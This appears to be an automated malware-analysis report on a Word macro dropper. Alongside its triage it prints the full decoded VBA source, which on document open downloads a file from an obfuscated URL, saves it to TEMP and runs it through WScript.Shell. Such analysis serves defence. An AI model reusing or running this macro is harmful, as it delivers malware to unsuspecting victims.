Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0158105354f139e5…

MALICIOUS

Office (OLE)

61.5 KB Created: 2016-05-05 00:39:00 Authoring application: Microsoft Office Word First seen: 2018-01-23
MD5: daea7636d67a9b94f7ae8dad25ac119d SHA-1: 62dc3e4f8f05d9590d7d2d81725277ce0a5be7e9 SHA-256: 0158105354f139e587869d6239c4333ebfb1254a3bdf6b33efce27e9fa8e5083
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of Shell() and WScript.Shell, suggesting the script attempts to download and execute a secondary payload. The ClamAV detection as 'Doc.Dropper.Donoff-5743530-0' further supports this dropper functionality.

Heuristics 10

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Public Function fjqQSV() As Object
    Set fjqQSV = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function SvpiLmWn() As Object
    Set SvpiLmWn = CreateObject("ADODB.Stream")
    End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub cUCAEEgFNo(ByVal GibAmKCS As Object, ByVal PAGGVIvQOW As String)
    CallByName GibAmKCS, PAGGVIvQOW, 1
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    GDLGVHO.DagOitCP
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4179 bytes
SHA-256: f8de1da55a5041cf1e68faff54f15dc4ea236d7e7314263a32acc9dc32c5a82f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
51 of 95 identifiers look randomly generated (e.g. 'TtGTuTnGneIlqqfqlqiTghTtI') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
GDLGVHO.DagOitCP
End Sub

Attribute VB_Name = "DERkKXt"
Public Function mwTST(ByVal eJwhcQI As String, ByVal bMNLIOrD As Integer) As String
mwTST = Mid(eJwhcQI, bMNLIOrD, 1)
End Function
Public Function VfORleZDVs(ByVal eJwhcQI As String, ByVal BhfgmELfI As String) As Boolean
VfORleZDVs = InStr(1, eJwhcQI, BhfgmELfI)
End Function

Attribute VB_Name = "pgkePk"
Public Sub cUCAEEgFNo(ByVal GibAmKCS As Object, ByVal PAGGVIvQOW As String)
CallByName GibAmKCS, PAGGVIvQOW, 1
End Sub
Public Sub WUpxwfwo(ByVal GibAmKCS As Object, ByVal PAGGVIvQOW As String, ByVal PQvtaMs As Variant)
CallByName GibAmKCS, PAGGVIvQOW, 1, PQvtaMs
End Sub
Public Sub uCNioOdeal(ByVal GibAmKCS As Object, ByVal PAGGVIvQOW As String, ByVal VgdFEocnDJ As Variant, ByVal YmqteatJ As Variant)
CallByName GibAmKCS, PAGGVIvQOW, 1, VgdFEocnDJ, YmqteatJ
End Sub
Public Function vNISuZNc(ByVal GibAmKCS As Object, ByVal PAGGVIvQOW As String, ByVal PQvtaMs As String) As Variant
Set vNISuZNc = CallByName(GibAmKCS, PAGGVIvQOW, 2, PQvtaMs)
End Function
Public Function SBHyBnYAg(ByVal GibAmKCS As Object, ByVal IrLsCCZ As String) As Variant
SBHyBnYAg = CallByName(GibAmKCS, IrLsCCZ, 2)
End Function
Public Sub jucnMua(ByVal GibAmKCS As Object, ByVal IrLsCCZ As String, ByVal oMAwTnDn As Variant)
CallByName GibAmKCS, IrLsCCZ, 4, oMAwTnDn
End Sub

Attribute VB_Name = "GDLGVHO"
Public Sub DagOitCP()
cfgaEwFw
End Sub
Private Sub cfgaEwFw()
On Error GoTo zpSVHKAFTS
qTCFusAo DEdilmpBeI, ZMnLs
wAdvZvBBu ZMnLs
Exit Sub
zpSVHKAFTS:
End Sub
Private Sub qTCFusAo(ByVal IZTSUhsNtn As String, ByVal RvtvjE As String)
Set NYAeuFMjq = UseSNmxV.NuiIsqp
NYAeuFMjq.Open sTuot.oBEYXCxNn("GeEupT", "Slupe"), IZTSUhsNtn, False
pgkePk.cUCAEEgFNo NYAeuFMjq, sTuot.oBEYXCxNn("SQelfndf", "Q7fqlJ")
miKacblNvU RvtvjE, pgkePk.SBHyBnYAg(NYAeuFMjq, sTuot.oBEYXCxNn("PRevsxupoxvnsPeuBvPoduyu", "uavPx"))
End Sub
Private Function kpAfw(ByVal aKHWsxq As String) As String
Set EcXUNI = pgkePk.vNISuZNc(UseSNmxV.fjqQSV, sTuot.oBEYXCxNn("EHnH2viHHrwown2m2e2nt2", "H2w"), sTuot.oBEYXCxNn("tPRgjOCgtEtSUS", "jgtU"))
kpAfw = EcXUNI(aKHWsxq)
End Function
Private Function DEdilmpBeI() As String
DEdilmpBeI = sTuot.oBEYXCxNn("hqtItTTpq:T//qGdrTqaIw.TtGTuTnGneIlqqfqlqiTghTtI.IqcoGTm/qaIqssGeGtTsGI/bq0TT22T4G6I9TqfI/IjIuiII/TcqsTs/IqbaIGsIeq/wGGoqrGd.TeGqxeG", "GITq")
End Function
Private Function LfNEGasPkG() As String
LfNEGasPkG = sTuot.oBEYXCxNn("/v5vgcv7dHge1vH7g00gHb.igevxeH", "Hvig")
End Function
Private Function ZMnLs() As String
ZMnLs = kpAfw(sTuot.oBEYXCxNn("TwE.SMqP", ".wSq1s")) & LfNEGasPkG
End Function
Private Sub wAdvZvBBu(ByVal CQSteM As String)
pgkePk.WUpxwfwo UseSNmxV.fjqQSV, sTuot.oBEYXCxNn("Eoxoveoc", "fov"), CQSteM
End Sub
Private Sub miKacblNvU(ByVal RvtvjE As String, ByVal xGduNqg As Variant)
Set jYiywHso = UseSNmxV.SvpiLmWn
pgkePk.jucnMua jYiywHso, sTuot.oBEYXCxNn("PTyDpDea", "urPDFa"), 1
pgkePk.cUCAEEgFNo jYiywHso, sTuot.oBEYXCxNn("O6CpCe6n", "S6C")
pgkePk.WUpxwfwo jYiywHso, sTuot.oBEYXCxNn("0WrCoitOCe", "oV0OC"), xGduNqg
pgkePk.uCNioOdeal jYiywHso, sTuot.oBEYXCxNn("SzaRGvePTzRoFPGilGte", "PRzGt"), RvtvjE, 2
pgkePk.cUCAEEgFNo jYiywHso, sTuot.oBEYXCxNn("SCSlSoTseT", "bST")
End Sub

Attribute VB_Name = "UseSNmxV"
Public Function SvpiLmWn() As Object
Set SvpiLmWn = CreateObject("ADODB.Stream")
End Function
Public Function fjqQSV() As Object
Set fjqQSV = CreateObject("WScript.Shell")
End Function
Public Function NuiIsqp() As Object
Set NuiIsqp = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function

Attribute VB_Name = "sTuot"
Public Function oBEYXCxNn(ByVal zYmqsudP As String, ByVal DzOSyP As String) As String
For bMNLIOrD = 1 To Len(zYmqsudP)
If Not DERkKXt.VfORleZDVs(DzOSyP, DERkKXt.mwTST(zYmqsudP, bMNLIOrD)) Then
oBEYXCxNn = oBEYXCxNn & DERkKXt.mwTST(zYmqsudP, bMNLIOrD)
End If
Next
End Function